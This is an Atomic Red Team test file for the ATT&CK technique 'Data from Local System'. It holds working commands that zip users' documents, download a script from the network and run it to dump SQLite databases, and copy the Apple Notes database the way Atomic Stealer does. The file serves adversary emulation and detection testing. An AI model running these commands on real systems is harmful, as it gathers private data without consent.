attack_technique: T1005
display_name: Data from Local System
atomic_tests:
- name: Search files of interest and save them to a single zip file (Windows)                                  
  auto_generated_guid: d3d9af44-b8ad-4375-8b0a-4bff4b7e419c
  description: |
    This test searches for files of certain extensions and saves them to a single zip file prior to extraction.                              
  supported_platforms:
  - windows
  input_arguments:
    starting_directory:
      description: Path to starting directory for the search
      type: Path
      default: C:\Users
    output_zip_folder_path:
      description: Path to directory for saving the generated zip file
      type: Path
      default: PathToAtomicsFolder\..\ExternalPayloads\T1005
    file_extensions:
      description: List of file extensions to be searched and zipped, separated by comma and space
      type: string
      default: .doc, .docx, .txt
  executor:
    command: |
      $startingDirectory = "#{starting_directory}"
      $outputZip = "#{output_zip_folder_path}"
      $fileExtensionsString = "#{file_extensions}" 
      $fileExtensions = $fileExtensionsString -split ", "

      New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null

      Function Search-Files {
        param (
          [string]$directory
        )
        $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
          $fileExtensions -contains $_.Extension.ToLower()
        }
        return $files
      }

      $foundFiles = Search-Files -directory $startingDirectory
      if ($foundFiles.Count -gt 0) {
        $foundFilePaths = $foundFiles.FullName
        Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"

        Write-Host "Zip file created: $outputZip\data.zip"
        } else {
            Write-Host "No files found with the specified extensions."
        }
    cleanup_command: |
      Remove-Item -Path  $outputZip\data.zip -Force

    name: powershell
    elevation_required: false
- name: Find and dump sqlite databases (Linux)
  auto_generated_guid: 00cbb875-7ae4-4cf1-b638-e543fd825300
  description: |
    An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.
  supported_platforms:
  - linux
  input_arguments:
    remote_url:
      description: url of remote payload
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src
  dependencies:
  - description: |
      Check if running on a Debian based machine.
    prereq_command: |
      if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi
      if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
      if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi
    get_prereq_command: |
      if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi
      if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi
  executor:
    name: bash
    elevation_required: false
    command: |
        cd $HOME
        curl -O #{remote_url}/art
        curl -O #{remote_url}/gta.db
        curl -O #{remote_url}/sqlite_dump.sh
        chmod +x sqlite_dump.sh
        find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
    cleanup_command: |
        rm -f $HOME/.art
        rm -f $HOME/gta.db
        rm -f $HOME/sqlite_dump.sh 

- name: Copy Apple Notes database files using AppleScript
  auto_generated_guid: cfb6d400-a269-4c06-a347-6d88d584d5f7
  description: |
    This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.
  supported_platforms:
  - macos
  input_arguments:
    destination_path:
      description: Specify the path to copy the database files into.
      type: path
      default: /private/tmp
  executor:
    command: |-
      osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
    cleanup_command: 'rm "#{destination_path}/NoteStore.sqlite*"'
    name: sh
    elevation_required: false